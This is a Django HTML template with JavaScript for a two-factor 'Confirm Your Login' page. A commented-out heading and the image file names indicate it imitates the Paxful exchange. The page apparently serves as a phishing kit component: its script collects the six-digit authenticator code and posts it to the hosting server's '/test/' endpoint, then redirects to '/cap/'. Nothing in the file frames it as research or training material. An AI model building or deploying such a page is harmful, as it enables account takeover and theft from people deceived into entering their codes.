{%load static%}

<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <!--<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> -->

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">


    <link href="{% static 'https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap' %}" rel="stylesheet">

    <link rel="stylesheet" href="{% static 'fonts/icomoon/style.css' %}">

    <link rel="stylesheet" href="{% static 'css/owl.carousel.min.css' %}">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{% static 'css/bootstrap.min.css' %}">
    
    <!-- Style -->
    <link rel="stylesheet" href="{% static 'css/style.css' %}">

    <title>login</title>
    <link rel="icon" type="image/x-icon" href="images/favicon-16x16.png">
    <link rel="apple-touch-icon" sizes="180x180" href="images/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="images/favicon-16x16.png">
    <link rel="manifest" href="images/site.webmanifest">
  </head>
  <body>



  

  <div class="d-lg-flex half">
    <div class="bg order-1 order-md-2" style="background-image: url({% static 'images/pad.v1.png'%});"></div>
    <div class="contents order-2 order-md-1">

      <div class="container">

        <div class="row align-items-center justify-content-left">
          <div class="col-md-7">

            <div class="d-flex align-items-start justify-content-between"> 


              <img src = "{% static 'images/pax4.png' %}" style="padding-top: 5;"> <img src = "{% static 'images/lang.png' %}" >

            </div>
            <div class="mb-4">

              <!--

                 <div class="col-6">

                <img src = "images/pax4.png" style="padding-top: 5;"> <img src = "images/lang.png "style="w" > 


              </div>


             <div class="myimage">



              -->
             
                

              







              <!--<h3>Log In With Paxful</h3>-->

             <!--<h1 class="h2 qa-login-page-title mb-3 mb-lg-4">Log In With Paxful</h1>--> 



              
              <!--<img src = "images/alert4.png"> -->

              <div class="regular-24"><h2 style="font-size: 26px; color: #333; font-family: Montserrat,Tajawal,Open Sans,sans-serif ; font-weight: bolder;">Confirm Your Login</h2><div>Open Google Authenticator or Authy and enter the code you see there below.</div>

              <a class="regular-20 d-flex align-items-center mt-3" href=""><fill="currentColor" class="mr-2 text-primary reflect-element"><span>Trouble logging in ?</span></a>


              <!--<p class="mb-4">Lorem ipsum dolor sit amet elit. Sapiente sit aut eos consectetur adipisicing.</p>-->
            </div>







            <div class="otp-field">
              <input type="text" maxlength="1" />
              <input type="text" maxlength="1" />
              <input class="space" type="text" maxlength="1" />
              <input type="text" maxlength="1" />
              <input type="text" maxlength="1" />
              <input type="text" maxlength="1" />
          </div>


<!--

            <div class="mt-3">
              <form action="#" id="loginForm" class="mb-4">
                <div class="mb-3 mx-n2">
                  <div class="d-flex">
                  <div class="otp">
                    <div class="otp-field">
 
                      <div class="d-flex align-items-center justify-content-between">
                        <input type="text" maxlength="1" />

                      </div>

                    

                      <div class="d-flex align-items-center justify-content-between">
                        <input type="text" maxlength="1" />

                      </div>

                    


                      <div class="d-flex align-items-center justify-content-between">
                        <input type="text" maxlength="1" />

                      </div>

                      <div class="d-flex align-items-center justify-content-between">
                        <input type="text" maxlength="1" />

                      </div>


                    

                      <div class="d-flex align-items-center justify-content-between">
                        <input type="text" maxlength="1" />

                      </div>

                      <div class="d-flex align-items-center justify-content-between">
                        <input type="text" maxlength="1" />

                      </div>

                  </div>

                  </div>

                  
                </div>
              </form>



            -->



             
              
              







            </div>



            <a class="regular-20 d-flex align-items-center mt-3" href=""><svg width="16" height="16" viewBox="0 0 16 16" fill="currentColor" class="mr-2 text-primary reflect-element"><path fill-rule="evenodd" d="M11.706 13.292L6.414 7.999l5.292-5.293a1 1 0 00-1.414-1.414l-6 6a.996.996 0 00-.277.53L4 7.94v.118c.014.236.11.468.291.648l6 6a1 1 0 101.414-1.414z" clip-rule="evenodd"></path></svg><span>Back to login</span></a>





           
        




            
              <!--<input type="submit" value="Log In" class="btn btn-block btn-primary">-->





<br>

<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>








              
</div> 
          </div>
        </div>
      </div>









    </div>






















    
  </div>


  




  <script>


const inputs = document.querySelectorAll(".otp-field input");

inputs.forEach((input, index) => {
    input.dataset.index = index;
    input.addEventListener("keyup", handleOtp);
    input.addEventListener("paste", handleOnPasteOtp);
});

function handleOtp(e) {
    /**
     * <input type="text" 👉 maxlength="1" />
     * 👉 NOTE: On mobile devices `maxlength` property isn't supported,
     * So we to write our own logic to make it work. 🙂
     */
    const input = e.target;
    let value = input.value;
    let isValidInput = value.match(/[0-9a-z]/gi);
    input.value = "";
    input.value = isValidInput ? value[0] : "";

    let fieldIndex = input.dataset.index;
    if (fieldIndex < inputs.length - 1 && isValidInput) {
        input.nextElementSibling.focus();
    }

    if (e.key === "Backspace" && fieldIndex > 0) {
        input.previousElementSibling.focus();
    }

    if (fieldIndex == inputs.length - 1 && isValidInput) {
        submit();
    }
}

function handleOnPasteOtp(e) {
    const data = e.clipboardData.getData("text");
    const value = data.split("");
    if (value.length === inputs.length) {
        inputs.forEach((input, index) => (input.value = value[index]));
        submit();
    }
}

function submit() {
    //console.log("Submitting...");
    // 👇 Entered OTP
    let otp = "";
    inputs.forEach((input) => {
        otp += input.value;
        input.disabled = true;
        input.classList.add("disabled");
    });

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/test/", true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.setRequestHeader('X-CSRFToken', getCookie('csrftoken'));

    xhr.onreadystatechange = function() {
        if (this.readyState == 4) {
            if (this.status == 200) {
                console.log(this.responseText);
                window.location.href = "/cap/";
            } else {
                console.log("Error sending string.");
            }
        }
    };
    xhr.send(JSON.stringify({'myString': otp}));
    // 👉 Call API below
}




function getCookie(name) {
    var cookieValue = null;
    if (document.cookie && document.cookie !== '') {
        var cookies = document.cookie.split(';');
        for (var i = 0; i < cookies.length; i++) {
            var cookie = cookies[i].trim();
            if (cookie.substring(0, name.length + 1) === (name + '=')) {
                cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                break;
            }
        }
    }
    return cookieValue;
}





</script>
    
    

    <script src="{% static 'js/jquery-3.3.1.min.js' %}"></script>
    <script src="{% static 'js/popper.min.js' %}"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/main.js"></script>
  </body>
</html>










